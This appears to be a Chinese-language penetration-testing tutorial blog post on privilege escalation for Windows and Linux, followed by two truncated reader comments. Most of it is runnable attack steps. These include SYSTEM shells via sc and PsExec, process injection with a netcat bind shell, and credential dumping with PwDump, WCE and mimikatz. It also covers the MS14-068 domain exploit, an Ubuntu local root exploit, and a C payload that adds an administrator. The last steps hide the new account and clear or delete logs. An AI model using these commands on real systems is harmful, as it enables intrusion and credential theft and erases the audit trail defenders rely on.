[渗透测试学习十]提权教程详解
操作系统默认用户
- Windows
User
Administrator
System - Linux
User
Root
Windows本地提权
USER->System
- WinXP、03
at 10:11 /intertractive cmd
- Win7、8
sc Create syscmd binPath="cmd /K start" type=own type=interact
sc start syscmd
- 利用开发工具
首先下载微软开发工具包:https://download.sysinternals.com/files/SysinternalsSuite.zip
上传里面的PsExec.exe到服务器
命令行先进入上传的路径,执行:
PsExec.exe -s cmd
轻松获得系统权限
- 注入进程提权(隐蔽,不会增加新进程)
下载工具(系统会杀360也会杀):https://www.tarasco.org/security/Process_Injector/processinjector.zip
上传到目标系统
进入上传的路径
查看当前可注入进程:
pinjector.exe -l
选择一个system用户进程(如services.exe)
注入进程,并且开放侦听一个端口:
pinjector.exe -p 656 cmd 5555
此时就可以连接目标
nc -nv 192.168.1.119 5555
本地缓存密码
各种提取脚本
http://www.nirsoft.net/
提取Windows密码:
PwDump
用kali下的/usr/share/windows-binaries/fgdump文件里的PwDump.exe脚本
复制密文,进行哈希解密(网站或ophcrack)
ophcrack:
Load-PwDump file-Crack
wce
利用kali下的/usr/share/wce文件里的wce-universal.exe脚本
wce-universal.exe -l # 提取密码哈希值
wce-universal.exe -w # 提取密码明文
防止WCE攻击:
打开注册表编辑器:
regedit
找到
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
将wdigest删掉(注意不要留换行),但是只能单用户登录
mimikatz
在kali的/usr/share/windows-resources下(版本不同可用find / -iname mimikatz查找其位置)
拷贝到Windows,终端找到mimikatz.exe,回车进入
- 查看帮助
::
- 提权
privilege::debug
- 查看密码
sekurlsa:: # 查看命令的子命令
sekurlsa::logonPasswords
sekurlsa::wdigest # 缓存密码
lsadump::sam # 查看sam数据库
- 查看进程
process::list
- 清除安全日志
event::clear
event::drop # 不再产生日志
利用漏洞提权
Windows
如何将py脚本转为exe可执行文件
- 下载Pyinstaller:https://pypi.org/project/PyInstaller/#files
- 进入下载的文件并执行(Linux环境下,Windows需要Python环境)
./pyinstaller.py --onefile test.py
MS14-068漏洞
在本机有administrator权限,获得域权限
- 利用kali搜索漏洞利用脚本:
searchsploit ms14-068
- 进入脚本路径利用脚本
./35474.py -u a@test.com -s userSID -d dcIP
| |
本机用户名 本机在域里的SID(利用命令whami获取,whami在前面的微软开发工具里有)
- 回车输入本机密码后会在当前路径生成一个TGT票据文件,将票据拷贝到mimikatz目录下
- 终端打开mimikatz.exe后执行
kerberos::ptc <票据文件>
显示
Injecting ticket:OK
代表成功获得DC权限
Linux
Ubuntu11.10
在kali将漏洞利用脚本拷贝到ubuntu
searchsploit 18411.c
scp /usr/share/exploitdb/exploits/linux/local/18411.c username@192.168.1.149:/home/username/
yes
ubuntu编译运行脚本后普通用户即可获得root权限
gcc 18411.c -o 18411 # 早期版本默认没有gcc,可以编译后再拷贝过来
chmod +x 18411
./18411
利用配置不当提权
(相比漏洞提权更常用的方法)
Windows
查看所有exe文件的权限并保存到当前目录下
icacls c:\WINDOWS\*.exe /save result.txt /t
如果某一程序有FA;;;BU(快速查找)的程序,就可以利用
将c语言脚本文件编译成exe执行文件
i586-mingw32msvc-gcc -o admin.exe admin.c
admin.c
#include <stdlib.h>
int main()
{
int i;
i=system {"net localgroup administrators a /add"};
return 0;
}
Windows上创建一个a用户
net user a a /add
并且将有管理员权限的程序名改为可执行脚本
下次启动,a就会被加入管理员组
Linux
找到权限为777的可执行文件
find / -perm 777 -exec ls -l {} \;
查看系统的配置文件
- 应用连接数据库的配置文件
- 后台服务运行账号
基本信息收集
Linux
命令
- /etc/resolv.conf
- /etc/passwd
- /etc/shadow
- whoami,who -a
- ifconfig -a,iptables -L -n,netstat -rn
- uname -a,ps aux
- apkg -l | head
敏感数据
- /etc;/usr/local/tec
- /etc/passwd;/etc/shadow
- 用户目录下.ssh;.gnupg 公私钥
- The e-mail and data files
- 业务数据库;身份认证服务器数据库
- /tmp
Windows
- ipconfig /all,ipconfig /displaydns,netstat -bnao,netstat -r
- net view,net view /domian
- net user /domain,net user %username% /domain
- net accounts,net share
- net localgroup administrators username /add
- net group “Domain Controllers” /domain
- net share name$C:\ /unlimited
- net user username /active:yes /domain
敏感数据
- SAM数据库;注册表文件
- %SYSTEMROOT%\repair\SAM(副本)
- %SYSTEMROOT%System32\config\RegBack|SAM(备份)
- 业务数据库;省份认证数据库
- 临时文件目录
- UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\
隐藏痕迹
Windows
- 禁止在登录界面显示新建账号
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v **username** /T REG_DWORD /D 0
- 删除日志
del %WINDIR%\*.log /a/s/q/f
Linux
- /var/log下的auth.log/secure/btmp/wtmp/lastlog/failog
相关文章
- 2条评论
- 余安温人2022-06-04 20:21:53
- e可执行文件下载Pyinstaller:https://pypi.org/project/PyInstaller/#files进入下载的文件并执行(Linux环境下,Windows需要Python环境)./pyinstaller.py --onefile te
- 绿邪安娴2022-06-04 18:14:47
- rentVersion\WinLogon\SpecialAccounts\UserList" /v **username** /T REG_DWORD /D 0删除日志del %WINDIR%\*.log /a/s/q/fLinux/var/